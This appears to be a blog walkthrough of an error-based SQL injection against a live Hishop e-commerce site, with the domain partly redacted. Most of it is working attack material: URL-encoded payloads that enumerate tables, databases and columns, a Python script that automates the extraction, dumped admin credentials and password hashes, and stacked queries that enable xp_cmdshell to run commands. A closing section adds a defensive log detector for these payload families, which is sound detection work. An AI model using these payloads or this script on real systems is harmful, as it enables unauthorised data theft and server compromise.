
A walkthrough of one MSSQL injection

0x00 Discovery

The target runs Hishop. Checking its known historical vulnerabilities turned up an injection point:

http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20(select%20@@version)%3E0%20and%20%271%27=%271


db_name():xxxshop017
user:xxxx017
@@servername:XXXSHOP
 

0x01 The frustrating part: dumping table names

So, start dumping the tables of xxxshop017:

http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20(%27Hishop_HelpCategories%27))%3E0%20and%20%271%27=%271


Tables can also be enumerated through information_schema:

http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=(select%20top%201%20table_name%20from%20information_schema.tables%20);--

Write a script to walk through the tables:

#coding:utf-8
#Author:LSA
#Description:hishop sqli for /user/UserRefundApply?OrderId=
#Date:20190701
import re
import requests
from bs4 import BeautifulSoup

headers = {
    'Cookie': '',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'
}
base_url = 'http://mall.xxx.com.cn/user/UserRefundApply?OrderId='
# names recovered so far; the payload excludes them via NOT IN (...) so each request leaks the next one
tables_name = "'Hishop_HelpCategories'"

def build_url(known):
    # error-based payload: the string-to-int comparison fails and the error page quotes the next table name
    return (base_url + '%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20('
            + known + '))%3E0%20and%20%271%27=%271')

def brute_tables():
    global tables_name
    for i in range(0, 300):
        url = build_url(tables_name)
        print(url)
        rsp = requests.get(url, headers=headers)
        soup = BeautifulSoup(rsp.text, "lxml")
        title = soup.title.string if soup.title else ''
        # the leaked table name is the single-quoted value in the error page title
        table_name = re.findall(r"'(.*?)'", title or '')
        if not table_name:
            break   # nothing quoted in the title: no more tables, or the request failed (e.g. 404 on an over-long URL)
        tables_name = tables_name + ",'" + table_name[0] + "'"
    print(tables_name)

if __name__ == '__main__':
    brute_tables()

Then the frustration started: the script threw an error!

Testing showed that once the URL exceeded 2093 characters the server returned 404. The same happened with both Burp and Chrome. The target runs IIS 8.5 + .NET 4; another site running the same Hishop (on IIS 7.5) did not return 404……

My guess is that ops changed the IIS maximum URL length, but that seems very unlikely!
No choice, then: dump with FOR XML PATH instead.
Dump all tables with FOR XML PATH():

http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=convert(int,(select%20quotename(name)%20from%20xxxshop017..sysobjects%20where%20xtype=%27U%27%20FOR%20XML%20PATH(%27%27)))%20and%20%271%27=%271

 
Because there are so many tables, the output ends in an ellipsis and not every table can be dumped in one go.

 
So split it into two queries with NOT IN: add the table names obtained from the first FOR XML PATH query to the NOT IN list.

http://mall.xxx.com.cn/USER/UserRefundApply?OrderId=%27%20and%201=CONVERT(INT,(select%20quotename(name)%20from%20xxxshop017..sysobjects%20where%20xtype=%27U%27%20and%20name%20not%20in%20(%27Hishop_HelpCategories%27,%27Hishop_Hotkeywords%27,%27Hishop_OrderDailyStatistics%27,%27Hishop_CountDownSku%27,%27Hishop_Helps%27,%27Hishop_NavMenu%27,%27Hishop_Gifts%27,%27Hishop_ProductConsultations%27,%27Hishop_MessageTemplates%27,%27CustomMade_Logs%27,%27Hishop_FriendlyLinks%27,%27Hishop_ProductAttributes%27,%27Hishop_MessageContent%27,%27Hishop_FightGroupActivities%27,%27Hishop_PointDetails%27,%27Hishop_MemberMessageBox%27,%27Hishop_FavoriteTags%27,%27Hishop_InpourRequest%27,%27Hishop_ExpressTemplates%27,%27Hishop_ManagerMessageBox%27,%27Hishop_SKUMemberPrice%27,%27Hishop_EmailQueue%27,%27Hishop_SKUItems%27,%27Hishop_DeliveryScope%27,%27Hishop_MenuClickRecords%27,%27Hishop_UserShippingAddresses%27,%27Hishop_DailyAccessStatistics%27,%27Hishop_Logs%27,%27Hishop_ShoppingCarts%27,%27Hishop_Coupons%27,%27Hishop_IntegrationSettings%27,%27Hishop_ProductPreSale%27,%27Hishop_GiftShoppingCarts%27,%27Hishop_PhotoGallery%27,%27Hishop_PromotionRegions%27,%27Hishop_ProductDailyAccessStatistics%27,%27Hishop_Favorite%27,%27Hishop_PhotoCategories%27,%27Hishop_MarketingImages%27,%27Hishop_PhoneCodeIPs%27,%27Hishop_PhoneCodeEveryDayTimes%27,%27Hishop_PrivilegeInRoles%27,%27aspnet_Referrals%27,%27Hishop_PaymentTypes%27,%27Hishop_ProductSpecificationImages%27,%27aspnet_MemberOpenIds%27,%27Hishop_Orders%27,%27Hishop_Products%27,%27Hishop_BalanceDrawRequest%27,%27aspnet_Roles%27,%27Hishop_Shippers%27,%27Hishop_BalanceDetails%27,%27ChangeStockLog%27,%27Hishop_Service%27,%27aspnet_MemberGrades%27,%27Hishop_RelatedProducts%27,%27aspnet_OpenIdSettings%27,%27Custom_Etickets%27,%27Hishop_RelatedArticsProducts%27,%27aspnet_MemberWXShoppingGuider%27,%27Hishop_Regions%27,%27aspnet_MemberWXReferral%27,%27Custom_EticketsResult%27,%27Hishop_RedEnvelopeSendRecord%27,%27aspnet_MemberTags%27,%27Hishop_RedEnvelopeGetRecord%27,%27Hishop_CombinationBuySKU%27)FOR%20XML%20PATH(%27%27)))%20and%20%271%27=%271


0x02 Getting column names and data

The admin account and password are most likely in one of two tables:
aspnet_Members and aspnet_Managers.
Start with aspnet_Members:

http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=(select%20top%201%20*%20from%20xxxshop017..aspnet_Members%20FOR%20XML%20PATH(%27%27))--

 

This yields the account admin with password xxx2018@.
Using where and not in, further rows can be retrieved one at a time.
Some accounts' passwords are stored in encrypted form (suspected RSA):
<Password>dNPQ/7vfChaeOmCL7Wb8mRmRq9U=</Password><PasswordSalt>5pk/VC1CM8ARImoqpquGpg==</PasswordSalt>
Now look at aspnet_Managers:

http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=(select%20top%201%20*%20from%20xxxshop017..aspnet_Managers%20FOR%20XML%20PATH(%27%27))--

 

The password cannot be decoded as base16/32/64;
it appears to be RSA-encrypted.

Logging in as admin with xxx2018@ failed.
Perhaps this is the wrong database, so try dumping all databases.
Dump all databases with FOR XML PATH():

http://mall.xxx.com.cn/USER/UserRefundApply?OrderId=%27%20and%20(select%20quotename(name)%20from%20master..sysdatabases%20FOR%20XML%20PATH(%27%27))%3E0%20and%20%271%27=%271

 
This reveals a database that probably holds the real account and password (the site's domain is mall):
[xxxmall]
Try a cross-database query:

http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=convert(int,(select%20quotename(name)%20from%20xxxmall..sysobjects%20where%20xtype=%27U%27%20FOR%20XML%20PATH(%27%27)))%20and%20%271%27=%271

No permission......
Try the extended stored procedures next.
Enable xp_cmdshell:

http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27;EXEC%20sp_configure%20%27show%20advanced%20options%27,%201;RECONFIGURE;EXEC%20sp_configure%20%27xp_cmdshell%27,%201;RECONFIGURE;--

Try running whoami:

http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27;exec%20master..xp_cmdshell%20%22whoami%22;--

Try listing a directory:

http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27;execute%20master..xp_dirtree%20%27C:%27;--

Out of tricks at this point......

0x03 Miscellaneous

Checking privileges:

and 1=(select IS_SRVROLEMEMBER('sysadmin')) // is the login a sysadmin?
and 1=(Select IS_MEMBER('db_owner')) // does it hold db_owner on the current database?
and 1=(select is_srvrolemember('serveradmin'))
and 1=(select is_srvrolemember('setupadmin'))
and 1=(select is_srvrolemember('securityadmin'))
and 1=(select is_srvrolemember('diskadmin'))
and 1=(select is_srvrolemember('bulkadmin'))

sqlmap --privileges
--privileges -U xxx017

Checking whether a table exists:

http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20(Select%20Count(*)%20from%20Hishop_PaymentaTypes)%3E0%20and%20%271%27=%271

or

http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20exists(select%20*%20from%20aspnet_Referralsa)%20and%20%271%27=%271

Dumping column names:

http://mall.xxx.com.cn/USER/UserRefundApply?OrderId=%27and%201=CONVERT(INT,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=%27aspnet_roles%27))--


Retrieving data:

http://mall.xxx.com.cn/USER/UserRefundApply?OrderId=%27%20and%201=CONVERT(INT,(select%20top%201%20rolename%20from%20aspnet_roles))--
 
http://mall.xxx.com.cn/USER/UserRefundApply?OrderId=%27%20and%201=(select%20top%201%20*%20from%20aspnet_Referrals%20where%20userid!=1123%20FOR%20XML%20PATH(%27%27))--
 
http://mall.xxx.com.cn/USER/UserRefundApply?OrderId=%27%20and%201=(select%20top%201%20*%20from%20aspnet_Referrals%20where%20userid!=1123%20and%20userid%20not%20in%20(%277448%27)%20FOR%20XML%20PATH(%27%27))--
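From the defender's side, the payload families used throughout this write-up (sysobjects/information_schema enumeration, CONVERT(INT, ...) error-based extraction, FOR XML PATH concatenation, IS_SRVROLEMEMBER probes, and stacked sp_configure/xp_cmdshell calls) are all visible in the web server's query-string field. The following detector is an added example, not code from the original post; it assumes IIS W3C logs with the field order given in the docstring, and the log lines it scans are constructed.

```python
import re
from urllib.parse import unquote_plus

# Payload families seen in this write-up, matched after URL-decoding.
SIGNATURES = {
    "schema-enum": re.compile(r"\b(sysobjects|sysdatabases|information_schema)\b", re.I),
    "error-based": re.compile(r"convert\s*\(\s*int\s*,|quotename\s*\(", re.I),
    "xml-concat":  re.compile(r"for\s+xml\s+path", re.I),
    "role-probe":  re.compile(r"is_(srvrole)?member\s*\(", re.I),
    "cmd-exec":    re.compile(r"xp_cmdshell|xp_dirtree|sp_configure", re.I),
}
STACKED = re.compile(r"'\s*;\s*exec", re.I)   # quote-terminated stacked query: ';exec ...

def classify(query_string):
    """Return the set of signature names matched by a raw (still URL-encoded) query string."""
    decoded = unquote_plus(query_string)
    hits = {name for name, rx in SIGNATURES.items() if rx.search(decoded)}
    if STACKED.search(decoded):
        hits.add("stacked")
    return hits

def scan_iis_log(lines):
    """Yield (client_ip, uri_stem, status, sorted_hits) for matching W3C log lines.
    Assumed field order: date time cs-uri-stem cs-uri-query c-ip sc-status."""
    for line in lines:
        if line.startswith("#") or not line.strip():
            continue                      # skip directives and blank lines
        date, time, stem, query, ip, status = line.split()[:6]
        hits = classify(query)
        if hits:
            yield ip, stem, int(status), sorted(hits)

# Constructed sample log (not a real capture); payloads mirror the ones in this post.
SAMPLE_LOG = """#Fields: date time cs-uri-stem cs-uri-query c-ip sc-status
2019-07-01 10:00:00 /user/UserRefundApply OrderId=20190701001 203.0.113.5 200
2019-07-01 10:00:05 /user/UserRefundApply OrderId=%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27)%3E0%20and%20%271%27=%271 198.51.100.7 500
2019-07-01 10:01:10 /user/UserRefundApply OrderId=%27%20and%201=convert(int,(select%20quotename(name)%20from%20x..sysobjects%20FOR%20XML%20PATH(%27%27)))-- 198.51.100.7 500
2019-07-01 10:02:00 /user/UserRefundApply OrderId=%27;exec%20master..xp_cmdshell%20%22whoami%22;-- 198.51.100.7 500
2019-07-01 10:02:30 /user/UserRefundApply OrderId=%27%20and%201=(select%20IS_SRVROLEMEMBER(%27sysadmin%27))-- 198.51.100.7 404
"""

if __name__ == "__main__":
    for ip, stem, status, hits in scan_iis_log(SAMPLE_LOG.splitlines()):
        print(f"{ip} {stem} status={status} hits={','.join(hits)}")
```

A 500 (conversion error) or 404 (over-long query string, as seen in this post) on a request that also matches one of these signatures is a stronger signal than either alone, so the status code is kept alongside the hits.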
